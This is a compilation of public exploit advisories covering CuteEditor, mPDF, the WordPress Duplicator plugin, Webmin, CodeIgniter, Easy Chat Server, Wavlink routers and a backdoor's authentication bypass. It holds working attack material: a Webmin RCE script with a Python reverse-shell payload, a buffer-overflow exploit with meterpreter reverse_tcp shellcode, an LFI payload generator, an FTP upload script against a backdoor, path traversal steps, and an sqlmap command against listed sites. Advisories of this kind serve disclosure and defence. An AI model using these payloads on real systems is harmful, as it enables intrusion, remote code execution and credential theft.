<pre><code># Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal<br /># Google Dork: N/A<br /># Date: November 17th, 2021<br /># Exploit Author: Stefan Hesselman<br /># Vendor Homepage: http://phphtmledit.com/<br /># Software Link: http://phphtmledit.com/download/phphtmledit.zip<br /># Version: 6.6<br /># Tested on: Windows Server 2019<br /># CVE : N/A<br /><br />There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.<br /><br />File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121<br /><br />Vulnerable code:<br />[SNIP]<br /> function ServerMapPath($input_path,$absolute_path,$virtual_path)<br /> {<br /> if($absolute_path!="")<br /> {<br /> return $absolute_path.str_ireplace($virtual_path,"",$input_path);<br /> }<br /> else<br /> {<br /> if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))<br /> { <br />if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { <br /> $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));<br />} <br />if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { <br /> $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));<br />}<br /> return $_SERVER["DOCUMENT_ROOT"].$input_path;<br /> }<br /> else<br /> {<br /> return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; <br /> }<br /> }<br /> }<br />[SNIP]<br /><br />ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.<br /><br />File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56<br /><br />Vulnerable function (renamefile, line 57):<br />[SNIP]<br />switch ($action)<br />{<br />[SNIP]<br /> case "renamefile":<br /> rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));<br /> print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";<br /> break;<br />[SNIP]<br /><br />$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:<br /><br />C:\Inetpub\wwwroot\..\..\..\poc.html<br /><br />Final result: writes poc.html to the webroot.<br /><br />STEPS:<br /><br />1. Create a poc.html file (XSS PoC will do).<br /><br /><HTML><br /><title>Path Traversal PoC</title><br /><BODY><br /><h1>PoC</h1><br /><script>alert('directory traversal');</script><br /></BODY><br /></HTML><br /><br />2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.<br />3. Select poc.html and select "Rename File".<br />4. Click on the pencil icon to the right of the poc.html file.<br />5. Rename file to "..\..\..\poc.html".<br />6. Press OK. poc.html is written three directories up.<br /><br />This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Destrukor.20<br />Vulnerability: Authentication Bypass <br />Description: The malware listens on TCP port 6969. However, after sending a specific cmd "rozmiar" the backdoor returns "moznasciagac" in Polish "you can download" and port 21 opens. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.<br />Family: Destrukor<br />Type: PE32<br />MD5: c790749f851d48e66e7d59cc2e451956<br />Dropped files: sys32.exe<br />Vuln ID: MVID-2022-0626<br />Disclosure: 07/30/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 6969<br />rozmiar<br /> moznasciagac<br /><br />C:\>nc64.exe 192.168.18.125 21<br />220 ICS FTP Server ready.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP \<br />250 CWD command successful. "C:/" is current directory.<br />MKD HATE<br />257 'C:\HATE': directory created.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,232,131).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=59523<br />DOOM="DOOM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: mPDF 7.0 - Local File Inclusion<br /># Google Dork: N/A<br /># Date: 2022-07-23<br /># Exploit Author: Musyoka Ian<br /># Vendor Homepage: https://mpdf.github.io/<br /># Software Link: https://mpdf.github.io/<br /># Version: CuteNews<br /># Tested on: Ubuntu 20.04, mPDF 7.0.x<br /># CVE: N/A<br /><br />#!/usr/bin/env python3<br /><br />from urllib.parse import quote<br />from cmd import Cmd<br />from base64 import b64encode<br /><br />class Terminal(Cmd):<br /> prompt = "\nFile >> "<br /> def default(self, args):<br /> payload_gen(args)<br />def banner():<br /> banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ <br /> | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | <br /> _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ <br /> | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|<br /> | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ <br /> |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|<br /> | | <br /> |_| """<br /> print(banner)<br />def payload_gen(fname):<br /> payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'<br /> encoded_payload = quote(payload)<br /> print("[+] Replace the content with the payload below")<br /><br /> print(f"Url encoded payload:\n{encoded_payload}\n")<br /> base64enc = b64encode(encoded_payload.encode())<br /> print(f"Base64 encoded payload:\n{base64enc.decode()}\n")<br />if __name__ == ("__main__"):<br /> banner()<br /> print("Enter Filename eg. /etc/passwd")<br /> terminal= Terminal()<br /> terminal.cmdloop()<br /> <br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download<br /># Google Dork: N/A<br /># Date: 07.27.2022<br /># Exploit Author: SecuriTrust<br /># Vendor Homepage: https://snapcreek.com/<br /># Software Link: https://wordpress.org/plugins/duplicator/<br /># Version: < 1.4.7<br /># Tested on: Linux, Windows<br /># CVE : CVE-2022-2551<br /># Reference: https://securitrust.fr<br /># Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551<br /><br />#Product:<br />WordPress Plugin Duplicator < 1.4.7<br /><br />#Vulnerability:<br />1-It allows an attacker to download the backup file.<br /><br />#Proof-Of-Concept:<br />1-Backup download.<br />The backup file can be downloaded using the "is_daws" parameter.<br />http://[PATH]/backups-dup-lite/dup-installer/main.installer.php<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure<br /># Google Dork: N/A<br /># Date: 07.27.2022<br /># Exploit Author: SecuriTrust<br /># Vendor Homepage: https://snapcreek.com/<br /># Software Link: https://wordpress.org/plugins/duplicator/<br /># Version: <= 1.4.7<br /># Tested on: Linux, Windows<br /># CVE : CVE-2022-2552<br /># Reference: https://securitrust.fr<br /># Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552<br /><br />#Product:<br />WordPress Plugin Duplicator <= 1.4.7<br /><br />#Vulnerability:<br />1-Some system information may be disclosure.<br /><br />#Proof-Of-Concept:<br />1-System information.<br />Some system information is obtained using the "view" parameter.<br />http://[PATH]/backups-dup-lite/dup-installer/main.installer.php<br /><br /></code></pre>
<pre><code># Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-07-25<br /># Exploit Author: Emir Polat<br /># Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165<br /># Vendor Homepage: https://www.webmin.com/<br /># Software Link: https://www.webmin.com/download.html<br /># Version: < 1.997<br /># Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)<br /># CVE: CVE-2022-36446<br /><br />import argparse<br />import requests<br />from bs4 import BeautifulSoup<br /><br />def login(args):<br /> global session<br /> global sysUser<br /><br /> session = requests.Session()<br /> loginUrl = f"{args.target}:10000/session_login.cgi"<br /> infoUrl = f"{args.target}:10000/sysinfo.cgi"<br /><br /> username = args.username<br /> password = args.password<br /> data = {'user': username, 'pass': password}<br /><br /> login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})<br /> sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})<br /><br /> bs = BeautifulSoup(sysInfo.text, 'html.parser')<br /> sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]<br /><br /> if sysUser:<br /> return True<br /> else:<br /> return False<br /><br />def exploit(args):<br /> payload = f"""<br /> 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));<br /> os.dup2(s.fileno(),0);<br /> os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');<br /> """<br /><br /> updateUrl = f"{args.target}:10000/package-updates"<br /> exploitUrl = f"{args.target}:10000/package-updates/update.cgi"<br /><br /> exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}<br /><br /> if login(args):<br /> print("[+] Successfully Logged In !")<br /> print(f"[+] Session Cookie => sid={session.cookies['sid']}")<br /> print(f"[+] User Found => {sysUser[0]}")<br /><br /> res = session.get(updateUrl)<br /> bs = BeautifulSoup(res.text, 'html.parser')<br /><br /> updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]<br /><br /> if updateAccess[0] == "package-updates":<br /> print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")<br /> print(f"[+] Exploit starting ... ")<br /> print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")<br /><br /> session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})<br /> session.post(exploitUrl, data=exploitData)<br /> else:<br /> print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")<br /> else:<br /> print("[-] Login Failed !")<br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")<br /> parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)<br /> parser.add_argument('-u', '--username', help='Username For Login', required=True)<br /> parser.add_argument('-p', '--password', help='Password For Login', required=True)<br /> parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)<br /> parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)<br /> parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)<br /> args = parser.parse_args()<br /> exploit(args)<br /> <br /></code></pre>
<pre><code>[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+]Exploit Title : CodeIgniter CMS Version 4.2.0 Sql Injection Vulnerability <br />[+] <br />[+]Exploit Author : E1.Coders <br />[+] <br />[+]Vendor Homepage : https://www.codeigniter.com/ <br />[+] <br />[+]Google Dork ONE : searchResult/?title=<br />[+] <br />[+]Google Dork Two : Job/searchResult/?title= <br />[+] <br />[+]Date : 15 / 05 / 2022 <br />[+] <br />[+]Tested On : windows + linux <br />[+] <br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION <~ ~ ~ <br />[+] <br />[+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. <br />[+] "codeigniter vulnerability ::$DATA view source code"<br />[+] Note that this find contains information about the site.<br />[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.<br />[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.<br />[+] The following URLs and parameters have been confirmed to suffer from SQL injection. <br />[+] <br />[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> Location <~ ~ ~ <br />[+] SQL ERROR Location <br />[+] http://www.site.com/Job/searchResult/?title=[SQL] <br />[+] <br />[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~> DEMO <~ ~ ~ <br />[+]<br />[+]<br />[+] ERROR : https://[removed].com/Job/searchResult/?title=123%27<br />[+]<br />[+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF' (OR= or ==)<br />[+]<br />[+] ERROR : https://[removed].ir/?per_page=400%2<br />[+]<br />[+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0<br />[+] <br />[+] ERROR : https://[removed].com/login/ (username = ' Password = ')<br />[+]<br />[+] ERROR : https://[removed].com/search.php?search=1'<br />[+]<br />[+] ERROR : https://[removed].com/news.php?p=7251'<br />[+]<br />[+] ERROR : https://[removed].com/employe/show.php?cvid=14088'<br />[+]<br />[+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'<br />[+]<br />[+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1<br />[+]<br />[+] ERROR : https://[removed].com/fa/FormView/1026'<br />[+]<br />[+] ERROR : https://[removed].com/fa/formview/1030'<br /> <br />[+] And Google More . . . \ .<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+]<br />[+] Methode Attack :<br />[+] <br />[+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks<br />[+] <br />[+] Step 2 : Add a variable " OR ' to the end of the URL "request"<br />[+] To display the PHP error related to not controlling the functions that cause the attacker to attack '<br />[+] <br />[+] Step 3 : Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+] About CMS :<br />[+] <br />[+] Codeigniter is an open source web software framework used to build dynamic websites. <br />[+] This framework, which is written in PHP language, <br />[+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, <br />[+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+] Explanation of vulnerability :<br />[+] <br />[+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack<br />[+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map.<br />[+] <br />[+] All different parts of the site have this security problem<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+] Solution :<br />[+] <br />[+] <br />[+] Use parameter input validation to be modified to prevent attacks<br />[+] "codeigniter vulnerability ::$DATA view source code"<br />[+] <br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br /></code></pre>
<pre><code># Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)<br /># Exploit Author: r00tpgp @ http://www.r00tpgp.com<br /># Usage: python easychat-exploit.py <victim-ip> <port><br /># Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990<br /># CVE: CVE-2004-2466 <br /># Installer: http://www.echatserver.com/<br /># Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)<br /><br />#!/usr/bin/python<br /><br />import sys, socket, time<br /> <br />host = sys.argv[1] # Recieve IP from user<br />port = int(sys.argv[2]) # Recieve Port from user<br /> <br />#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"<br />buf = ""<br />buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"<br />buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"<br />buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"<br />buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"<br />buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"<br />buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"<br />buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"<br />buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"<br />buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"<br />buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"<br />buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"<br />buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"<br />buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"<br />buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"<br />buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"<br />buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"<br />buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"<br />buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"<br />buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"<br />buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"<br />buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"<br />buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"<br />buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"<br />buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"<br />buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"<br />buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"<br />buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"<br />buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"<br /><br />junk = "A"*217<br />nseh = "\xeb\x06\x90\x90" # short jump 6 bytes<br />seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL<br />nops = "\x90"*16<br /><br />header = (<br /> "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"<br /> "User-Agent: Mozilla/4.0\r\n"<br /> "Host: 192.168.1.136:80\r\n"<br /> "Accept-Language: en-us\r\n"<br /> "Accept-Encoding: gzip, deflate\r\n"<br /> "Referer: http://192.168.1.136\r\n"<br /> "Connection: Keep-Alive\r\n\r\n"<br /> )<br />client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket<br />client.connect((host, port)) # Connect to user supplied port and IP address<br />client.send(header) # Send the user command with a variable length name<br />client.close() # Close the Connection<br /> <br /></code></pre>
<pre><code># Exploit Title: Wavlink WN530HG4 - Password Disclosure<br /># Date: 2022-06-12<br /># Exploit Author: Ahmed Alroky<br /># Author Company : AIactive<br /># Version: M30HG4.V5030.191116<br /># Vendor home page : wavlink.com<br /># Authentication Required: No<br /># CVE : CVE-2022-34047<br /># Tested on: Windows<br /><br /># Exploit<br /><br />view-source:http://IP_address/set_safety.shtml?r=52300<br />search for var syspasswd="<br />you will find the username and the password<br /><br /></code></pre>
<pre><code># Exploit Title: Wavlink WN533A8 - Password Disclosure<br /># Date: 2022-06-12<br /># Exploit Author: Ahmed Alroky<br /># Author Company : AIactive<br /># Version: M33A8.V5030.190716<br /># Vendor home page : wavlink.com<br /># Authentication Required: No<br /># CVE : CVE-2022-34046<br /># Tested on: Windows<br /><br /># Exploit<br /><br />view-source:http://IP_ADDRESS/sysinit.shtml<br />search for var syspasswd="<br />you will find the username and the password<br /><br /></code></pre>